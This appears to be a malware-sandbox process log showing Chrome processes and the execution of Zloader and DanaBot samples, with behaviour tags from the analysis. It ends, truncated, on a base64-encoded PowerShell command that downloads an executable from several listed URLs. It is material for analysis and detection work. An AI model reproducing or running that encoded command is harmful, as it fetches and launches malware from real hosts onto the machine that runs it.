  PID:2836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=5460,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5084 /prefetch:1
  2⤵
  PID:3888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=5856,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4956 /prefetch:1
  2⤵
  PID:4928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=6076,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5664 /prefetch:1
  2⤵
  PID:2460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=5508,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5300 /prefetch:1
  2⤵
  PID:4220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6552,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5720 /prefetch:8
  2⤵
  PID:1000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=976,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4556 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=3536,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6532 /prefetch:1
  2⤵
  PID:316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=6104,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6704 /prefetch:1
  2⤵
  PID:4648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=4428,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6896 /prefetch:1
  2⤵
  PID:4408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=6700,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6836 /prefetch:1
  2⤵
  PID:3192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=6888,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6980 /prefetch:1
  2⤵
  PID:1892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=6808,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6800 /prefetch:1
  2⤵
  PID:1748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=6092,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6796 /prefetch:1
  2⤵
  PID:3780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=5040,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4556 /prefetch:1
  2⤵
  PID:3912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=6820,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6576 /prefetch:1
  2⤵
  PID:5084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=6764,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5788 /prefetch:1
  2⤵
  PID:1168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=7084,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7056 /prefetch:1
  2⤵
  PID:4228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=6704,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6752 /prefetch:1
  2⤵
  PID:5056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=7072,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7048 /prefetch:1
  2⤵
  PID:3096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=6892,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7392 /prefetch:1
  2⤵
  PID:2444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=6796,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7092 /prefetch:1
  2⤵
  PID:3492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=7448,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6504 /prefetch:1
  2⤵
  PID:680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=7340,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6720 /prefetch:1
  2⤵
  PID:180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=6864,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6424 /prefetch:1
  2⤵
  PID:1724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=7444,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7420 /prefetch:1
  2⤵
  PID:512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=4632,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6192 /prefetch:1
  2⤵
  PID:4788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=7144,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6320 /prefetch:1
  2⤵
  PID:1224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=5704,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6356 /prefetch:1
  2⤵
  PID:1632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=6268,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3516 /prefetch:1
  2⤵
  PID:3668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=6348,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5608 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --field-trial-handle=5016,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7212 /prefetch:1
  2⤵
  PID:1420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=5096,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=724 /prefetch:1
  2⤵
  PID:3048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=6368,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5828 /prefetch:1
  2⤵
  PID:4668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5396,i,14900503462230972563,5165013446893471946,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5136 /prefetch:8
  2⤵
  PID:5080

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3488

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:1012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff86584cc40,0x7ff86584cc4c,0x7ff86584cc58
  2⤵
  PID:1684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1932 /prefetch:2
  2⤵
  PID:64
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2008,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2160 /prefetch:3
  2⤵
  PID:2168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2312,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2640 /prefetch:8
  2⤵
  PID:4136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3212 /prefetch:1
  2⤵
  PID:2012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:2548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4568,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4616 /prefetch:1
  2⤵
  PID:2488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4756 /prefetch:8
  2⤵
  PID:5100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4516,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4904 /prefetch:8
  2⤵
  PID:2848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4764,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4768 /prefetch:8
  2⤵
  PID:4956
- C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  PID:3000
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x7ff6b10d4698,0x7ff6b10d46a4,0x7ff6b10d46b0
    3⤵
    - Drops file in Program Files directory
    PID:4408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4436,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5076 /prefetch:8
  2⤵
  PID:464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5288,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5304 /prefetch:8
  2⤵
  PID:3204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5292,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5076 /prefetch:8
  2⤵
  PID:3748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5328,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4856 /prefetch:8
  2⤵
  PID:4848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5324 /prefetch:8
  2⤵
  PID:4032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5224,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5208 /prefetch:2
  2⤵
  PID:2444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4800,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5156 /prefetch:1
  2⤵
  PID:4804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4840,i,6932701369085365522,13043928933874832558,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3428 /prefetch:1
  2⤵
  PID:3288

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:436

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Banking-Malware\Zloader.xlsm"
1⤵
- Enumerates connected drives
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4100
- C:\Windows\System32\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll,DllRegisterServer
  2⤵
  - Process spawned unexpected child process
  PID:2920

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:4200
- C:\Windows\SysWOW64\regsvr32.exe
  C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\Desktop\THE-MA~1\BANKIN~1\DanaBot.dll f1 C:\Users\Admin\Desktop\THE-MA~1\BANKIN~1\DanaBot.exe@4200
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1688
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\Desktop\THE-MA~1\BANKIN~1\DanaBot.dll,f0
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1064
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 460
  2⤵
  - Program crash
  PID:2716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4200 -ip 4200
1⤵
PID:4948

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\[email protected]" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2420
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgAC